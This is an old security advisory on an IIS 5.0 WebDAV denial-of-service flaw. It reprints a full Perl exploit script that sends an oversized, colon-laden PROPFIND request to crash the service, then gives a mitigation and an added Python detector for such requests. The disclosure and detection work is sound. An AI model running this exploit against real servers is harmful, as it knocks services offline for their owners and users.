From: xmzw (小米粥)
Compiled by: williamlong (2001-05-18 12:16:14), internal message
Edited by: China ASP
Affected program:
IIS
Description:
A specially crafted PROPFIND request causes a denial of service in IIS 5.0
Details:
A denial-of-service vulnerability in IIS 5.0 was discovered recently. A remote attacker who submits a specially crafted PROPFIND request can cause the IIS-related services to restart; submitting such requests continuously results in a denial of service against IIS.
The following code is provided only for testing and researching this vulnerability; if you use it for improper purposes, you bear the consequences yourself.
Basically the problem is a very long but valid PROPFIND request containing lots of ":".
Demonstration:
--vv9.pl-------------------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;
printf "Written by Georgi Guninski wait some time\n";
$port = @ARGV[1];
$host = @ARGV[0];
sub vv()
{
$ll=$_[0];
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") ||
return;
$over=":" x $ll ; # the ":" is the most important
$ch=pack("C",65); # just to check whether potential payload is possible - yes
$tmp = $ch x 64;
$over= $ch x 4 . $over . $tmp;
$over1=":" x $ll; #not sure about this
$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."$over1".':">';
$xml=$xml.'<a:prop><a:displayname />'."<u:$over />".'</a:prop></a:propfind>'."\n\n";
$l=length($xml);
$req="PROPFIND / HTTP/1\.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,200);
print $res;
close $socket;
}
do vv(59060);
#this is overflow, repeat several times - 49060 seems the smallest #, may need to change
sleep(1);
do vv(59060);
Affected systems:
IIS 5.0
Solution:
Microsoft has not yet released a patch; users are advised to disable the WebDAV extensions for the time being.
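As an added defender-side example (not part of the original post or of Guninski's script): a Python routine that inspects a raw HTTP request and flags PROPFIND requests of the shape described above, i.e. an oversized XML body or a Content-Length far beyond what a real PROPFIND needs, and long runs of ":" inside the XML. It is the kind of check a reverse proxy or log-replay tool could apply while WebDAV cannot yet be disabled. The thresholds MAX_PROPFIND_BODY and MAX_COLON_RUN are assumed values chosen for illustration, and both sample requests are constructed here, with the suspicious one using a colon run of only 200 rather than the tens of thousands in the script.

```python
import re
from dataclasses import dataclass, field

# Thresholds are assumptions chosen for this example, not values from the advisory.
MAX_PROPFIND_BODY = 8192   # bytes; ordinary WebDAV PROPFIND bodies are far smaller
MAX_COLON_RUN = 16         # longest run of ':' tolerated anywhere in the XML body
COLON_RUN = re.compile(rb":{%d,}" % (MAX_COLON_RUN + 1))


@dataclass
class Verdict:
    suspicious: bool
    reasons: list = field(default_factory=list)


def split_request(raw: bytes):
    """Split a raw HTTP request into (method, headers, body).

    Accepts both CRLF and bare LF line endings, since the advisory's script
    sends bare LF."""
    sep = b"\r\n\r\n" if b"\r\n\r\n" in raw else b"\n\n"
    head, _, body = raw.partition(sep)
    lines = head.replace(b"\r\n", b"\n").split(b"\n")
    method = lines[0].split(b" ", 1)[0].upper()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()   # header names are case-insensitive
    return method, headers, body


def inspect_propfind(raw: bytes) -> Verdict:
    """Return a Verdict for one raw HTTP request; only PROPFIND is examined."""
    method, headers, body = split_request(raw)
    if method != b"PROPFIND":
        return Verdict(False)
    reasons = []
    declared = headers.get(b"content-length", b"")
    if declared.isdigit() and int(declared) > MAX_PROPFIND_BODY:
        reasons.append(f"declared Content-Length {int(declared)} exceeds {MAX_PROPFIND_BODY}")
    if len(body) > MAX_PROPFIND_BODY:
        reasons.append(f"received body of {len(body)} bytes exceeds {MAX_PROPFIND_BODY}")
    m = COLON_RUN.search(body)
    if m:
        reasons.append(f"run of {len(m.group())} ':' characters in XML body")
    return Verdict(bool(reasons), reasons)


def make_request(body: bytes) -> bytes:
    """Wrap an XML body in a PROPFIND request (constructed sample, CRLF framing)."""
    return (b"PROPFIND / HTTP/1.1\r\nHost: webdav.example\r\nContent-Type: text/xml\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n" + body)


# A normal WebDAV client asking for a resource's display name (constructed).
BENIGN_BODY = (b'<?xml version="1.0"?><a:propfind xmlns:a="DAV:">'
               b'<a:prop><a:displayname /></a:prop></a:propfind>')

# Constructed to mirror the shape the advisory describes, at a much smaller size.
SUSPECT_BODY = (b'<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'
                + b":" * 200 + b'"><a:prop><a:displayname /><u:'
                + b":" * 200 + b' /></a:prop></a:propfind>')


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("suspect", SUSPECT_BODY)):
        v = inspect_propfind(make_request(body))
        print(label, "suspicious" if v.suspicious else "ok", v.reasons)
```

The check deliberately tests the declared Content-Length as well as the bytes actually received, so a proxy can reject the request before buffering a huge body; the colon-run rule is what distinguishes this advisory's payload from a merely large but legitimate property request.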